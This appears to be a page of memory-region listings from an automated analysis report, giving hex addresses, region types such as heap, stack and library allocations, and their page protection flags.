1887EBAD000
|
heap
|
page read and write
|
||
14E385D0000
|
trusted library allocation
|
page read and write
|
||
1760A791000
|
heap
|
page read and write
|
||
7FFD9B3EA000
|
trusted library allocation
|
page read and write
|
||
1FD65200000
|
trusted library allocation
|
page read and write
|
||
3DE7000
|
heap
|
page read and write
|
||
15CE000
|
heap
|
page read and write
|
||
2120000
|
heap
|
page read and write
|
||
1FD64F9D000
|
heap
|
page read and write
|
||
176249C0000
|
heap
|
page read and write
|
||
205679C6000
|
heap
|
page read and write
|
||
20567989000
|
heap
|
page read and write
|
||
2056BC31000
|
heap
|
page read and write
|
||
1A5EA272000
|
trusted library allocation
|
page read and write
|
||
7DF4BDB20000
|
trusted library allocation
|
page readonly
|
||
1CAD8C35000
|
trusted library allocation
|
page read and write
|
||
205679C8000
|
heap
|
page read and write
|
||
1A5E5513000
|
heap
|
page read and write
|
||
B50000
|
heap
|
page read and write
|
||
20567B2F000
|
heap
|
page read and write
|
||
1A5E5BA0000
|
trusted library section
|
page readonly
|
||
23D000
|
unkown
|
page write copy
|
||
8347E75000
|
stack
|
page read and write
|
||
205679C6000
|
heap
|
page read and write
|
||
1C2D4306000
|
heap
|
page read and write
|
||
1CAD8E68000
|
trusted library allocation
|
page read and write
|
||
1CAD6559000
|
trusted library allocation
|
page read and write
|
||
1CAD6555000
|
trusted library allocation
|
page read and write
|
||
205679BF000
|
heap
|
page read and write
|
||
1CAD8C35000
|
trusted library allocation
|
page read and write
|
||
7FFD9B4B0000
|
trusted library allocation
|
page execute and read and write
|
||
1661000
|
heap
|
page read and write
|
||
834827F000
|
stack
|
page read and write
|
||
20567993000
|
heap
|
page read and write
|
||
205679BF000
|
heap
|
page read and write
|
||
1667000
|
heap
|
page read and write
|
||
205679C2000
|
heap
|
page read and write
|
||
205679B3000
|
heap
|
page read and write
|
||
176248AD000
|
heap
|
page read and write
|
||
205679BF000
|
heap
|
page read and write
|
||
1C2D424D000
|
heap
|
page read and write
|
||
15F6000
|
heap
|
page read and write
|
||
18726238000
|
heap
|
page read and write
|
||
1872629D000
|
heap
|
page read and write
|
||
205679BF000
|
heap
|
page read and write
|
||
1C2D43E6000
|
heap
|
page read and write
|
||
1FD6500B000
|
heap
|
page read and write
|
||
2056BAF2000
|
heap
|
page read and write
|
||
1872629B000
|
heap
|
page read and write
|
||
205679C1000
|
heap
|
page read and write
|
||
1CAD89D3000
|
heap
|
page read and write
|
||
20567B0F000
|
heap
|
page read and write
|
||
18800B8B000
|
trusted library allocation
|
page read and write
|
||
205679B1000
|
heap
|
page read and write
|
||
231000
|
unkown
|
page readonly
|
||
18801679000
|
trusted library allocation
|
page read and write
|
||
2464639000
|
stack
|
page read and write
|
||
1887C9A0000
|
trusted library allocation
|
page read and write
|
||
1887ECA0000
|
heap
|
page read and write
|
||
1CAD8E68000
|
trusted library allocation
|
page read and write
|
||
20567B85000
|
heap
|
page read and write
|
||
1872622B000
|
heap
|
page read and write
|
||
1CAD643C000
|
heap
|
page read and write
|
||
1A5E6101000
|
trusted library allocation
|
page read and write
|
||
14E3767B000
|
trusted library allocation
|
page read and write
|
||
205679BA000
|
heap
|
page read and write
|
||
18801DBC000
|
trusted library allocation
|
page read and write
|
||
13AE000
|
stack
|
page read and write
|
||
1872626C000
|
heap
|
page read and write
|
||
289CFA000
|
stack
|
page read and write
|
||
14E4DFD8000
|
heap
|
page read and write
|
||
205679BF000
|
heap
|
page read and write
|
||
205679BF000
|
heap
|
page read and write
|
||
1CAD6807000
|
heap
|
page read and write
|
||
2056BE19000
|
trusted library allocation
|
page read and write
|
||
15FB000
|
heap
|
page read and write
|
||
1C2D43EE000
|
heap
|
page read and write
|
||
1760C590000
|
trusted library allocation
|
page read and write
|
||
1760A8F5000
|
heap
|
page read and write
|
||
7FFD9B251000
|
trusted library allocation
|
page read and write
|
||
1CAD60F0000
|
trusted library allocation
|
page read and write
|
||
14E33C30000
|
heap
|
page read and write
|
||
205679C6000
|
heap
|
page read and write
|
||
7FFD9B380000
|
trusted library allocation
|
page read and write
|
||
834807E000
|
stack
|
page read and write
|
||
7DF4BDB21000
|
trusted library allocation
|
page execute read
|
||
289E7E000
|
stack
|
page read and write
|
||
1720FFA000
|
stack
|
page read and write
|
||
28AD4E000
|
stack
|
page read and write
|
||
1CAD6489000
|
heap
|
page read and write
|
||
205679CC000
|
heap
|
page read and write
|
||
7FFD9B45C000
|
trusted library allocation
|
page read and write
|
||
205679C3000
|
heap
|
page read and write
|
||
1400000
|
heap
|
page read and write
|
||
7FFD9B350000
|
trusted library allocation
|
page read and write
|
||
246427E000
|
stack
|
page read and write
|
||
1A5E4ED0000
|
heap
|
page read and write
|
||
1A5E5A40000
|
trusted library allocation
|
page read and write
|
||
15FB000
|
heap
|
page read and write
|
||
1CAD8C0E000
|
trusted library allocation
|
page read and write
|
||
2056BD22000
|
trusted library allocation
|
page read and write
|
||
1A5EA21F000
|
trusted library allocation
|
page read and write
|
||
9EE84FE000
|
stack
|
page read and write
|
||
3AC4000
|
heap
|
page read and write
|
||
3E80000
|
direct allocation
|
page read and write
|
||
7FFD9B320000
|
trusted library allocation
|
page read and write
|
||
14E45EF5000
|
trusted library allocation
|
page read and write
|
||
7DF486D80000
|
trusted library allocation
|
page execute and read and write
|
||
14E35A70000
|
trusted library allocation
|
page read and write
|
||
13D0000
|
heap
|
page read and write
|
||
7FFD9B230000
|
trusted library allocation
|
page read and write
|
||
205679BF000
|
heap
|
page read and write
|
||
1C2D4306000
|
heap
|
page read and write
|
||
187264F5000
|
heap
|
page read and write
|
||
1B9A7CD3000
|
heap
|
page read and write
|
||
205679BF000
|
heap
|
page read and write
|
||
7FFD9B360000
|
trusted library allocation
|
page read and write
|
||
17624990000
|
heap
|
page execute and read and write
|
||
39C0000
|
direct allocation
|
page read and write
|
||
1C2D5B90000
|
heap
|
page read and write
|
||
7FFD9B082000
|
trusted library allocation
|
page read and write
|
||
1BEF000
|
stack
|
page read and write
|
||
1A5EA241000
|
trusted library allocation
|
page read and write
|
||
7DA8AFC000
|
stack
|
page read and write
|
||
163D000
|
heap
|
page read and write
|
||
7FFD9B080000
|
trusted library allocation
|
page read and write
|
||
1760A77F000
|
heap
|
page read and write
|
||
1CAD8C35000
|
trusted library allocation
|
page read and write
|
||
205679C7000
|
heap
|
page read and write
|
||
205679BF000
|
heap
|
page read and write
|
||
7FFD9B320000
|
trusted library allocation
|
page read and write
|
||
2056BAC7000
|
heap
|
page read and write
|
||
1872626C000
|
heap
|
page read and write
|
||
15C9000
|
heap
|
page read and write
|
||
20566D98000
|
trusted library allocation
|
page read and write
|
||
28ACCC000
|
stack
|
page read and write
|
||
1CAD8CA0000
|
trusted library allocation
|
page read and write
|
||
18726150000
|
heap
|
page read and write
|
||
14E33D08000
|
heap
|
page read and write
|
||
165C000
|
heap
|
page read and write
|
||
205679BF000
|
heap
|
page read and write
|
||
1887EC80000
|
heap
|
page read and write
|
||
18800BA7000
|
trusted library allocation
|
page read and write
|
||
20567B20000
|
heap
|
page read and write
|
||
205679BF000
|
heap
|
page read and write
|
||
1872620B000
|
heap
|
page read and write
|
||
17624AF0000
|
heap
|
page read and write
|
||
1CAD8D00000
|
trusted library allocation
|
page read and write
|
||
1B9A7D73000
|
heap
|
page read and write
|
||
2056BDF0000
|
trusted library allocation
|
page read and write
|
||
20567B26000
|
heap
|
page read and write
|
||
205679BF000
|
heap
|
page read and write
|
||
1CAD647D000
|
heap
|
page read and write
|
||
1CAD8C05000
|
trusted library allocation
|
page read and write
|
||
7FFD9B0A0000
|
trusted library allocation
|
page read and write
|
||
205679B3000
|
heap
|
page read and write
|
||
1CAD682E000
|
heap
|
page read and write
|
||
1CAD63B1000
|
heap
|
page read and write
|
||
159F000
|
heap
|
page read and write
|
||
289F7C000
|
stack
|
page read and write
|
||
205679C1000
|
heap
|
page read and write
|
||
18801BFC000
|
trusted library allocation
|
page read and write
|
||
2CA58FE000
|
unkown
|
page readonly
|
||
7FFD9B4C0000
|
trusted library allocation
|
page read and write
|
||
1FD64FF8000
|
heap
|
page read and write
|
||
1887C773000
|
heap
|
page read and write
|
||
1661000
|
heap
|
page read and write
|
||
205679C6000
|
heap
|
page read and write
|
||
14E4E0A8000
|
heap
|
page read and write
|
||
7FFD9B0C0000
|
trusted library allocation
|
page read and write
|
||
1887EB80000
|
heap
|
page read and write
|
||
2CA60FE000
|
unkown
|
page readonly
|
||
834863E000
|
stack
|
page read and write
|
||
14E4E0C0000
|
heap
|
page read and write
|
||
205679C1000
|
heap
|
page read and write
|
||
2056BB35000
|
heap
|
page read and write
|
||
7DA84DA000
|
stack
|
page read and write
|
||
B4E000
|
stack
|
page read and write
|
||
2056BD18000
|
trusted library allocation
|
page read and write
|
||
B80000
|
heap
|
page read and write
|
||
205679C6000
|
heap
|
page read and write
|
||
205679D3000
|
heap
|
page read and write
|
||
1CAD8C14000
|
trusted library allocation
|
page read and write
|
||
2056BD22000
|
trusted library allocation
|
page read and write
|
||
15C5000
|
heap
|
page read and write
|
||
205679C6000
|
heap
|
page read and write
|
||
2056BE14000
|
trusted library allocation
|
page read and write
|
||
20567AD5000
|
heap
|
page read and write
|
||
1760C789000
|
trusted library allocation
|
page read and write
|
||
205679BF000
|
heap
|
page read and write
|
||
4234000
|
direct allocation
|
page read and write
|
||
20567B13000
|
heap
|
page read and write
|
||
7FFD9B360000
|
trusted library allocation
|
page read and write
|
||
1760A794000
|
heap
|
page read and write
|
||
1468000
|
heap
|
page read and write
|
||
205679C6000
|
heap
|
page read and write
|
||
1CAD8910000
|
heap
|
page read and write
|
||
188010C0000
|
trusted library allocation
|
page read and write
|
||
1CAD8934000
|
heap
|
page read and write
|
||
205679C1000
|
heap
|
page read and write
|
||
41FC000
|
direct allocation
|
page read and write
|
||
2056BB5F000
|
heap
|
page read and write
|
||
2056BBF2000
|
heap
|
page read and write
|
||
205679C6000
|
heap
|
page read and write
|
||
1CAD67CE000
|
heap
|
page read and write
|
||
1CAD6489000
|
heap
|
page read and write
|
||
15FD000
|
heap
|
page read and write
|
||
205679BF000
|
heap
|
page read and write
|
||
20567B8A000
|
heap
|
page read and write
|
||
1B9A776A000
|
heap
|
page read and write
|
||
20567B2F000
|
heap
|
page read and write
|
||
18726232000
|
heap
|
page read and write
|
||
1A5EA500000
|
heap
|
page read and write
|
||
3D62000
|
heap
|
page read and write
|
||
20567989000
|
heap
|
page read and write
|
||
18726236000
|
heap
|
page read and write
|
||
205679C6000
|
heap
|
page read and write
|
||
1CAD8C13000
|
trusted library allocation
|
page read and write
|
||
205679C1000
|
heap
|
page read and write
|
||
7FFD9B455000
|
trusted library allocation
|
page read and write
|
||
1A5EA2A4000
|
trusted library allocation
|
page read and write
|
||
1CAD63A8000
|
heap
|
page read and write
|
||
1C2D4306000
|
heap
|
page read and write
|
||
1760A890000
|
heap
|
page read and write
|
||
20567999000
|
heap
|
page read and write
|
||
7FFD9B290000
|
trusted library allocation
|
page execute and read and write
|
||
159F000
|
heap
|
page read and write
|
||
1872628E000
|
heap
|
page read and write
|
||
1FD64ED0000
|
heap
|
page read and write
|
||
157F000
|
heap
|
page read and write
|
||
205679BF000
|
heap
|
page read and write
|
||
7FFD9B4E0000
|
trusted library allocation
|
page read and write
|
||
18810011000
|
trusted library allocation
|
page read and write
|
||
14E360CD000
|
trusted library allocation
|
page read and write
|
||
1C2D5BA9000
|
heap
|
page read and write
|
||
2056ACCE000
|
trusted library allocation
|
page read and write
|
||
9EE7FFE000
|
stack
|
page read and write
|
||
1CAD89EA000
|
heap
|
page read and write
|
||
1A5E4C76000
|
heap
|
page read and write
|
||
1A5EA4C5000
|
heap
|
page read and write
|
||
205679BF000
|
heap
|
page read and write
|
||
245000
|
unkown
|
page readonly
|
||
1CAD8E40000
|
trusted library allocation
|
page read and write
|
||
7FFD9B2B0000
|
trusted library allocation
|
page read and write
|
||
2056BBF7000
|
heap
|
page read and write
|
||
205679C6000
|
heap
|
page read and write
|
||
1B9A7F89000
|
trusted library allocation
|
page read and write
|
||
1CAD6559000
|
trusted library allocation
|
page read and write
|
||
205679AA000
|
heap
|
page read and write
|
||
20566BD9000
|
heap
|
page read and write
|
||
205679BF000
|
heap
|
page read and write
|
||
20567B50000
|
heap
|
page read and write
|
||
1887E843000
|
heap
|
page read and write
|
||
1A5E5BD0000
|
trusted library section
|
page readonly
|
||
205679B3000
|
heap
|
page read and write
|
||
20567956000
|
heap
|
page read and write
|
||
2056BC45000
|
heap
|
page read and write
|
||
24647BE000
|
stack
|
page read and write
|
||
1CAD649A000
|
heap
|
page read and write
|
||
1A5EA2AF000
|
trusted library allocation
|
page read and write
|
||
3A69000
|
heap
|
page read and write
|
||
205679C1000
|
heap
|
page read and write
|
||
7FFD9BB30000
|
trusted library allocation
|
page read and write
|
||
163A000
|
heap
|
page read and write
|
||
7FFD9B0AD000
|
trusted library allocation
|
page execute and read and write
|
||
2056BCBC000
|
trusted library allocation
|
page read and write
|
||
1CAD6436000
|
heap
|
page read and write
|
||
205679AF000
|
heap
|
page read and write
|
||
1B9A7765000
|
heap
|
page read and write
|
||
20567B45000
|
heap
|
page read and write
|
||
1CAD89EB000
|
heap
|
page read and write
|
||
2056BE19000
|
trusted library allocation
|
page read and write
|
||
205679BF000
|
heap
|
page read and write
|
||
20567AFF000
|
heap
|
page read and write
|
||
1CAD8908000
|
heap
|
page read and write
|
||
1CAD6439000
|
heap
|
page read and write
|
||
3A71000
|
heap
|
page read and write
|
||
7FFD9BA46000
|
trusted library allocation
|
page read and write
|
||
1CAD8C10000
|
trusted library allocation
|
page read and write
|
||
20D000
|
unkown
|
page readonly
|
||
1CAD8E63000
|
trusted library allocation
|
page read and write
|
||
1B9A5FD5000
|
heap
|
page read and write
|
||
205679C6000
|
heap
|
page read and write
|
||
83484BC000
|
stack
|
page read and write
|
||
2056BD2C000
|
trusted library allocation
|
page read and write
|
||
1CAD6467000
|
heap
|
page read and write
|
||
4474000
|
direct allocation
|
page read and write
|
||
14E45C46000
|
trusted library allocation
|
page read and write
|
||
7FFD9B3F0000
|
trusted library allocation
|
page read and write
|
||
2056BC42000
|
heap
|
page read and write
|
||
205679C7000
|
heap
|
page read and write
|
||
205679C1000
|
heap
|
page read and write
|
||
1A5EA442000
|
heap
|
page read and write
|
||
1FD64F54000
|
heap
|
page read and write
|
||
170000
|
unkown
|
page readonly
|
||
24643FE000
|
stack
|
page read and write
|
||
1721378000
|
stack
|
page read and write
|
||
1887EBB9000
|
heap
|
page read and write
|
||
1CAD6463000
|
heap
|
page read and write
|
||
1CAD643C000
|
heap
|
page read and write
|
||
15EF000
|
heap
|
page read and write
|
||
15EB000
|
heap
|
page read and write
|
||
4310000
|
direct allocation
|
page read and write
|
||
2056BB5D000
|
heap
|
page read and write
|
||
20567AAC000
|
heap
|
page read and write
|
||
20567A90000
|
remote allocation
|
page read and write
|
||
205679C1000
|
heap
|
page read and write
|
||
1887E895000
|
heap
|
page read and write
|
||
157E000
|
heap
|
page read and write
|
||
18726238000
|
heap
|
page read and write
|
||
205679BF000
|
heap
|
page read and write
|
||
2CA5CFE000
|
unkown
|
page readonly
|
||
20567AFD000
|
heap
|
page read and write
|
||
1FD64F60000
|
heap
|
page read and write
|
||
7DF48D840000
|
trusted library allocation
|
page execute and read and write
|
||
15AD000
|
heap
|
page read and write
|
||
8347FFD000
|
stack
|
page read and write
|
||
20567976000
|
heap
|
page read and write
|
||
20567B26000
|
heap
|
page read and write
|
||
1FD64FD5000
|
heap
|
page read and write
|
||
14E4E008000
|
heap
|
page read and write
|
||
20567B26000
|
heap
|
page read and write
|
||
2056BC54000
|
heap
|
page read and write
|
||
1664000
|
heap
|
page read and write
|
||
1872629D000
|
heap
|
page read and write
|
||
1430000
|
heap
|
page read and write
|
||
205679BF000
|
heap
|
page read and write
|
||
1A5E5502000
|
heap
|
page read and write
|
||
1A5E5BF0000
|
trusted library section
|
page readonly
|
||
205679C1000
|
heap
|
page read and write
|
||
187262AC000
|
heap
|
page read and write
|
||
1CAD890A000
|
heap
|
page read and write
|
||
9EE82FE000
|
stack
|
page read and write
|
||
1C2D43EE000
|
heap
|
page read and write
|
||
2056ACC3000
|
trusted library allocation
|
page read and write
|
||
7FFD9B3F0000
|
trusted library allocation
|
page read and write
|
||
14E38EC6000
|
trusted library allocation
|
page read and write
|
||
1760C570000
|
trusted library allocation
|
page read and write
|
||
7FFD9B4A0000
|
trusted library allocation
|
page read and write
|
||
1CAD892D000
|
heap
|
page read and write
|
||
7FFD9B3E0000
|
trusted library allocation
|
page read and write
|
||
1CAD8E73000
|
trusted library allocation
|
page read and write
|
||
23D000
|
unkown
|
page write copy
|
||
1872ACE0000
|
trusted library allocation
|
page read and write
|
||
1CAD8E6C000
|
trusted library allocation
|
page read and write
|
||
205679C1000
|
heap
|
page read and write
|
||
2CA557E000
|
stack
|
page read and write
|
||
1CAD890C000
|
heap
|
page read and write
|
||
42FC000
|
direct allocation
|
page read and write
|
||
1CAD89C0000
|
heap
|
page read and write
|
||
20567B1C000
|
heap
|
page read and write
|
||
1CAD680B000
|
heap
|
page read and write
|
||
8348437000
|
stack
|
page read and write
|
||
1577000
|
heap
|
page read and write
|
||
1CAD6490000
|
heap
|
page read and write
|
||
1B9A7C80000
|
heap
|
page read and write
|
||
20567ACC000
|
heap
|
page read and write
|
||
20567976000
|
heap
|
page read and write
|
||
7FFD9B47E000
|
trusted library allocation
|
page read and write
|
||
2CA547E000
|
stack
|
page read and write
|
||
1FD64EF0000
|
heap
|
page read and write
|
||
15A8000
|
heap
|
page read and write
|
||
1CAD6559000
|
trusted library allocation
|
page read and write
|
||
188010A7000
|
trusted library allocation
|
page read and write
|
||
1CAD6806000
|
heap
|
page read and write
|
||
14E37926000
|
trusted library allocation
|
page read and write
|
||
7FFD9B186000
|
trusted library allocation
|
page execute and read and write
|
||
2056BBFD000
|
heap
|
page read and write
|
||
20567A90000
|
remote allocation
|
page read and write
|
||
1CAD6472000
|
heap
|
page read and write
|
||
1A5E5791000
|
trusted library allocation
|
page read and write
|
||
1CAD89C0000
|
heap
|
page read and write
|
||
7FFD9B390000
|
trusted library allocation
|
page read and write
|
||
1C2D4310000
|
heap
|
page read and write
|
||
1CAD8E6B000
|
trusted library allocation
|
page read and write
|
||
2056C1A0000
|
heap
|
page readonly
|
||
13F0000
|
heap
|
page read and write
|
||
205679C1000
|
heap
|
page read and write
|
||
1CAD6559000
|
trusted library allocation
|
page read and write
|
||
205679BF000
|
heap
|
page read and write
|
||
44F4000
|
direct allocation
|
page read and write
|
||
7FFD9B99D000
|
trusted library allocation
|
page execute and read and write
|
||
205679A6000
|
heap
|
page read and write
|
||
15A7000
|
heap
|
page read and write
|
||
3E1A000
|
heap
|
page read and write
|
||
2056BD18000
|
trusted library allocation
|
page read and write
|
||
7FFD9B4E3000
|
trusted library allocation
|
page read and write
|
||
1760C770000
|
trusted library allocation
|
page read and write
|
||
83483BF000
|
stack
|
page read and write
|
||
18726460000
|
heap
|
page read and write
|
||
24645B7000
|
stack
|
page read and write
|
There are 2311 hidden memdumps, click here to show them.